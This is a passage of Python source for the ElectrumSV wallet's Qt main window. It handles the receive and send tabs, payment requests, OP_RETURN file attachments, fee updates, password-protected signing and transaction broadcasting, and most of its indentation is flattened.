elapsed = time.time() - self.last_notify_tx_time
if elapsed < self.notify_tx_rate:
# spam control. force tx notify popup to not appear more often than every 30
# seconds by enqueing the request for a timer to handle it sometime later
self.tx_notify_timer = QTimer(self)
self.tx_notify_timer.setSingleShot(True)
self.tx_notify_timer.timeout.connect(self.notify_tx_cb)
when = (self.notify_tx_rate - elapsed)
self.logger.debug("Notify spam control: will notify GUI of %d new tx's in %f seconds",
len(self.tx_notifications), when)
            self.tx_notify_timer.start(int(when * 1e3)) # time in ms
else:
# it's been a while since we got a tx notify -- so do it immediately (no timer
# necessary)
self.notify_tx_cb()
def notify(self, message):
self.app.tray.showMessage("ElectrumSV", message,
read_QIcon("electrum_dark_icon"), 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path
# selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getOpenFileNames(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileNames, __ = QFileDialog.getOpenFileNames(self, title, directory, filter)
if fileNames and directory != os.path.dirname(fileNames[0]):
self.config.set_key('io_dir', os.path.dirname(fileNames[0]), True)
return fileNames
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases (used to be used for openalias)
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, app_state.num_zeros, app_state.decimal_point,
is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' ' + app_state.base_unit()
x = app_state.fx.format_amount_and_units(amount)
if text and x:
text += ' (%s)'%x
return text
def get_amount_and_units(self, amount: int) -> Tuple[str, str]:
bitcoin_text = self.format_amount(amount) + ' ' + app_state.base_unit()
if app_state.fx.is_enabled():
fiat_text = app_state.fx.format_amount_and_units(amount)
else:
fiat_text = ''
return bitcoin_text, fiat_text
def format_fee_rate(self, fee_rate: int) -> str:
return format_fee_satoshis(fee_rate/1000, app_state.num_zeros) + ' sat/B'
def connect_fields(self, window, btc_e, fiat_e, fee_e):
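        # The "follows" flag prevents a feedback loop: while one edit is being updated
        # programmatically from the other, its own change handler returns early.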
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = app_state.fx.exchange_rate() if app_state.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(app_state.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
async def maintain_network_status(self):
while True:
await self.wallet.progress_event.wait()
self.network_status_signal.emit(self.wallet)
# Throttle updates
await asyncio.sleep(1.0)
def update_network_status(self, wallet):
if wallet != self.wallet:
return
text = _("Offline")
if self.network:
if wallet.request_count > wallet.response_count:
text = _("Synchronizing...")
text += f' {wallet.response_count:,d}/{wallet.request_count:,d}'
else:
wallet.request_count = 0
wallet.response_count = 0
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if server_lag > 1:
text = _("Server {} blocks behind").format(server_lag)
else:
text = _("Connected")
self._status_bar.set_network_status(text)
def update_status(self):
balance_status = False
fiat_status = None
if self.network and self.network.is_connected():
balance_status = True
# append fiat balance and price
if app_state.fx.is_enabled():
c, u, x = self.wallet.get_balance()
fiat_status = app_state.fx.get_fiat_status(
c, app_state.base_unit(), app_state.decimal_point)
self.set_status_bar_balance(balance_status)
self._status_bar.set_fiat_status(fiat_status)
@profiler
def update_wallet(self):
self.update_status()
if self.wallet.is_synchronized() or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.history_updated_signal.emit()
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return l
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc=None, prompt_if_unsaved=False):
'''tx_desc is set only for txs created in the Send tab'''
tx_dialog = TxDialog(tx, self, tx_desc, prompt_if_unsaved)
tx_dialog.finished.connect(partial(self.on_tx_dialog_finished, tx_dialog))
self.tx_dialogs.append(tx_dialog)
tx_dialog.show()
return tx_dialog
def on_tx_dialog_finished(self, tx_dialog, status):
tx_dialog.finished.disconnect()
self.tx_dialogs.remove(tx_dialog)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address = None
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin SV address where the payment should be received. '
'Note that each payment request uses a different Bitcoin SV address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.NoFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit()
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(app_state.fx.get_currency if app_state.fx else '')
if not app_state.fx or not app_state.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them '
'a signed payment request.'),
_('Expired requests have to be deleted manually from your list, '
'in order to free the corresponding Bitcoin SV addresses.'),
_('The Bitcoin SV address never expires and will always be part '
'of this ElectrumSV wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(
QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
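    # Payment requests are stored in wallet.receive_requests keyed by address;
    # deleting one also resets the receive form back to the wallet's current
    # receiving address.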
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr.to_string(), '')
amount = req['amount']
URI = web.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
return str(URI)
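    # The request URI is the plain payment URI from web.create_URI() with the
    # request's creation time and expiry appended as extra query parameters.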
def save_payment_request(self):
        if not self.receive_address:
            self.show_error(_('No receiving address'))
            return False
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = [x[1] for x in expiration_values][i]
req = self.wallet.make_payment_request(self.receive_address, amount,
message, expiration)
self.wallet.add_payment_request(req, self.config)
self.request_list.update()
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests[addr]
pr_data = paymentrequest.PaymentRequest.from_wallet_entry(r).to_json()
name = r['id'] + '.bip270.json'
fileName = self.getSaveFileName(_("Select where to save your payment request"),
name, "*.bip270.json")
if fileName:
with open(fileName, "w") as f:
f.write(pr_data)
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which '
'cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_(
'Warning: The next address will not be recovered automatically if '
'you restore your wallet from seed; you may need to add it manually.\n\n'
'This occurs because you have too many unused addresses in your wallet. '
'To avoid this situation, use the existing addresses first.\n\n'
'Create anyway?'
)):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address = addr
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.update_receive_address_widget()
def update_receive_address_widget(self):
text = ''
if self.receive_address:
text = self.receive_address.to_string()
self.receive_address_e.setText(text)
def clear_receive_tab(self):
self.expires_label.hide()
self.expires_combo.show()
self.set_receive_address(self.wallet.get_receiving_address())
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
self.receive_address = addr
self.show_receive_tab()
self.new_request_button.setEnabled(True)
self.update_receive_address_widget()
def update_receive_qr(self):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = web.create_URI(self.receive_address, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(self.receive_address_e.text(), amount,
message, uri)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
# This ensures all columns are stretched over the full width of the last tab.
grid.setColumnStretch(4, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit()
self.payto_e = PayToEdit(self)
# From fields row.
# This is enabled by "spending" coins in the coins tab.
self.from_label = QLabel(_('From'))
self.from_label.setContentsMargins(0, 5, 0, 0)
self.from_label.setAlignment(Qt.AlignTop)
grid.addWidget(self.from_label, 1, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['Address / Outpoint','Amount'])
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 1, 1, 1, -1)
self.set_pay_from([])
msg = (_('Recipient of the funds.') + '\n\n' +
_('You may enter a Bitcoin SV address, a label from your list of '
'contacts (a list of completions will be proposed), or an alias '
'(email-like address that forwards to a Bitcoin SV address)'))
payto_label = HelpLabel(_('Pay to'), msg)
payto_label.setSizePolicy(QSizePolicy.Maximum, QSizePolicy.Preferred)
grid.addWidget(payto_label, 2, 0)
grid.addWidget(self.payto_e, 2, 1, 1, -1)
msg = (_('Amount to be sent.') + '\n\n' +
_('The amount will be displayed in red if you do not have '
'enough funds in your wallet.') + ' '
+ _('Note that if you have frozen some of your addresses, the available '
'funds will be lower than your total balance.') + '\n\n'
+ _('Keyboard shortcut: type "!" to send all your coins.'))
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(app_state.fx.get_currency if app_state.fx else '')
if not app_state.fx or not app_state.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Preferred)
grid.addWidget(self.max_button, 3, 3)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = (_('Description of the transaction (not mandatory).') + '\n\n' +
_('The description is not sent to the recipient of the funds. '
'It is stored in your wallet file, and displayed in the \'History\' tab.'))
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 4, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 4, 1, 1, -1)
# OP_RETURN fields row
msg_attached = (_('Attached files (optional).') + '\n\n' +
_('Posts PERMANENT data to the Bitcoin SV blockchain as part of '
'this transaction using OP_RETURN.') + '\n\n' +
_('If you attach files, the \'Pay to\' field can be left blank.'))
attached_data_label = HelpLabel(_('Attached Files'), msg_attached)
attached_data_label.setContentsMargins(0, 5, 0, 0)
attached_data_label.setAlignment(Qt.AlignTop)
grid.addWidget(attached_data_label, 5, 0)
hbox = QHBoxLayout()
hbox.setSpacing(0)
def attach_menu(*args):
pass
self.send_data_list = MyTreeWidget(self, attach_menu,
[ "", _("File size"), _("File name"), "" ], 2)
self.send_data_list.setSelectionMode(MyTreeWidget.SingleSelection)
self.send_data_list.setSelectionBehavior(MyTreeWidget.SelectRows)
hbox.addWidget(self.send_data_list)
vbox = QVBoxLayout()
vbox.setSpacing(0)
vbox.setContentsMargins(5, 0, 0, 0)
attach_button = EnterButton("", self._do_add_send_attachments)
attach_button.setToolTip(_("Add file(s)"))
attach_button.setIcon(read_QIcon("icons8-attach-96.png"))
attach_button.setSizePolicy(QSizePolicy.Maximum, QSizePolicy.Maximum)
vbox.addWidget(attach_button)
vbox.addStretch()
hbox.addLayout(vbox)
self._on_send_data_list_updated()
grid.addLayout(hbox, 5, 1, 1, -1)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(
_('Display the details of your transactions before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
if self.network is None:
self.send_button.setEnabled(False)
self.send_button.setToolTip(_('You are using ElectrumSV in offline mode; restart '
'ElectrumSV if you want to get connected'))
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
buttons.addStretch(1)
grid.addLayout(buttons, 6, 0, 1, -1)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(t):
self.is_max = False
self.max_button.setEnabled(not bool(t))
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
if self.not_enough_funds:
amt_color = ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += (' (' + self.format_amount(c+u+x).strip() + ' ' +
app_state.base_unit() + ' ' + _("are frozen") + ')')
if self.amount_e.isModified():
amt_color = ColorScheme.DEFAULT
else:
amt_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
return w
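    # spend_max() only flags the amount as "send everything"; the concrete
    # value is filled in by do_update_fee() once a draft transaction has been
    # built from the spendable coins.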
def spend_max(self):
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return self.wallet.dummy_address()
def get_custom_fee_text(self, fee_rate = None):
if not self.config.has_custom_fee_rate():
return ""
else:
if fee_rate is None: fee_rate = self.config.custom_fee_rate() / 1000.0
return str(round(fee_rate*100)/100) + " sats/B"
def get_opreturn_outputs(self, outputs):
table = self.send_data_list
file_paths = []
for row_index in range(table.model().rowCount()):
item = table.topLevelItem(row_index)
file_paths.append(item.data(0, Qt.UserRole))
if len(file_paths):
data_chunks = []
for file_path in file_paths:
with open(file_path, "rb") as f:
data_chunks.append(f.read())
script = (Script() << OP_RETURN).push_many(data_chunks)
return [TxOutput(0, script)]
return []
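    # All attached files are packed into a single zero-value output whose
    # script is OP_RETURN followed by one push per file's raw bytes.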
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
amount = all if self.is_max else self.amount_e.get_amount()
if amount is None:
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee = None
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
addr = self.get_payto_or_dummy()
outputs = [TxOutput(amount, addr.to_script())]
outputs.extend(self.get_opreturn_outputs(outputs))
try:
tx = self.wallet.make_unsigned_transaction(self.get_coins(), outputs,
self.config, fee)
self.not_enough_funds = False
except NotEnoughFunds:
self.not_enough_funds = True
return
except Exception:
return
if self.is_max:
amount = tx.output_value()
self.amount_e.setAmount(amount)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format_utxo(utxo):
h = utxo.tx_hash
return '{}...{}:{:d}\t{}'.format(h[0:10], h[-10:],
utxo.out_index, utxo.address)
for utxo in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem(
[format_utxo(utxo), self.format_amount(utxo.value)]))
update_fixed_tree_height(self.from_list)
def get_contact_payto(self, contact_id):
contact = self.contacts.get_contact(contact_id)
return contact.label
def protected(func): # pylint: disable=no-self-argument
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
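    # Methods decorated with @protected receive the password via the 'password'
    # keyword argument, e.g.:
    #
    #     @protected
    #     def show_seed_dialog(self, password): ...
    #
    # so call sites invoke them without that argument (hence the pylint
    # "no-value-for-parameter" suppressions elsewhere in this class).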
def read_send_tab(self):
        isInvoice = False
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
isInvoice = True
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid lines found:") + "\n\n" +
'\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1]
for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
outputs.extend(self.get_opreturn_outputs(outputs))
if not outputs:
self.show_error(_('No outputs'))
return
if any(output.value is None for output in outputs):
self.show_error(_('Invalid Amount'))
return
fee = None
coins = self.get_coins(isInvoice)
return outputs, fee, label, coins
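    # Returns (outputs, fee, label, coins), or a falsy value when validation
    # fails and an error has already been shown; do_send() treats a falsy
    # result as "nothing to do".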
def _on_send_data_list_updated(self):
item_count = self.send_data_list.model().rowCount()
is_enabled = item_count > 0
self.send_data_list.setEnabled(is_enabled)
self.send_data_list.setToolTip(_("Attach a file to include it in the transaction."))
update_fixed_tree_height(self.send_data_list, maximum_height=80)
def _do_add_send_attachments(self):
dialogs.show_named('illegal-files-are-traceable')
table = self.send_data_list
file_paths = self.getOpenFileNames(_("Select file(s)"))
last_item = None
for file_path in file_paths:
file_name = os.path.basename(file_path)
file_size = os.path.getsize(file_path)
item = QTreeWidgetItem()
item.setData(0, Qt.UserRole, file_path)
item.setIcon(0, read_QIcon("icons8-file-512.png"))
item.setText(1, str(file_size))
item.setTextAlignment(1, Qt.AlignRight | Qt.AlignVCenter)
item.setText(2, file_name)
            table.addTopLevelItem(item)
# Setting item column widgets only works when the item is added to the table.
delete_button = QPushButton()
delete_button.clicked.connect(partial(self._on_delete_attachment, file_path))
delete_button.setFlat(True)
delete_button.setCursor(QCursor(Qt.PointingHandCursor))
delete_button.setIcon(read_QIcon("icons8-trash.svg"))
table.setItemWidget(item, 3, delete_button)
last_item = item
if last_item is not None:
self._on_send_data_list_updated()
table.scrollToItem(last_item)
def _on_delete_attachment(self, file_path, checked=False):
table = self.send_data_list
for row_index in range(table.model().rowCount()):
item = table.topLevelItem(row_index)
item_file_path = item.data(0, Qt.UserRole)
if item_file_path == file_path:
table.takeTopLevelItem(row_index)
break
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
dialogs.show_named('think-before-sending')
r = self.read_send_tab()
if not r:
return
outputs, fee, tx_desc, coins = r
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except ExcessiveFee:
self.show_message(_("Your fee is too high. Max is 50 sat/byte."))
return
except Exception as e:
self.logger.exception("")
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(output.value for output in outputs)
fee = tx.get_fee()
if preview:
self.show_transaction(tx, tx_desc)
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
confirm_rate = 2 * self.config.max_fee_rate()
if fee < (tx.estimated_size()):
msg.append(_('Warning') + ': ' +
_('The fee is less than 1000 sats/kb. '
'It may take a very long time to confirm.'))
if self.wallet.has_password():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password, window=None):
self.sign_tx_with_password(tx, callback, password, window=window)
def sign_tx_with_password(self, tx, callback, password, window=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_done(future):
try:
future.result()
except Exception as exc:
self.on_exception(exc)
callback(False)
else:
callback(True)
def sign_tx():
if self.tx_external_keypairs:
tx.sign(self.tx_external_keypairs)
else:
self.wallet.sign_transaction(tx, password)
window = window or self
WaitingDialog(window, _('Signing transaction...'), sign_tx, on_done=on_done)
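    # When a payment request (invoice) is active, broadcast_transaction() hands
    # the signed transaction to the requestor via pr.send_payment() instead of
    # broadcasting it to the network itself.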
def broadcast_transaction(self, tx, tx_desc, success_text=None, window=None):
if success_text is None:
success_text = _('Payment sent.')
window = window or self
def broadcast_tx():
# non-GUI thread
status = False
msg = "Failed"
pr = self.payment_request
if pr:
if pr.has_expired():
self.payment_request = None
raise Exception(_("Payment request has expired"))
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_payment(str(tx), refund_address)
msg = ack_msg
if ack_status:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
return None
else:
return self.network.broadcast_transaction_and_wait(tx)
def on_done(future):
# GUI thread
try:
tx_id = future.result()
except Exception as exception:
self.logger.info(f'raw server error (untrusted): {exception}')
reason = broadcast_failure_reason(exception)
d = UntrustedMessageDialog(
window, _("Transaction Broadcast Error"),
_("Your transaction was not sent: ") + reason + ".",
exception)
d.exec()
else:
if tx_id:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
window.show_message(success_text + '\n' + tx_id)
self.invoice_list.update()
self.do_clear()
WaitingDialog(window, _('Broadcasting transaction...'), broadcast_tx, on_done=on_done)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.max_button.setDisabled(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.set_validated()
else:
self.payto_e.set_expired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), app_state.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = web.parse_URI(URI, self.on_pr)
except Exception as e:
self.show_error(str(e))
return
self.show_send_tab()
payment_url = out.get('r')
if payment_url:
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
edit_fields = []
edit_fields.extend(self.send_tab.findChildren(QPlainTextEdit))
edit_fields.extend(self.send_tab.findChildren(QLineEdit))
for edit_field in edit_fields:
edit_field.setText('')
edit_field.setFrozen(False)
for tree in self.send_tab.findChildren(QTreeView):
tree.clear()
self._on_send_data_list_updated()
self.max_button.setDisabled(False)
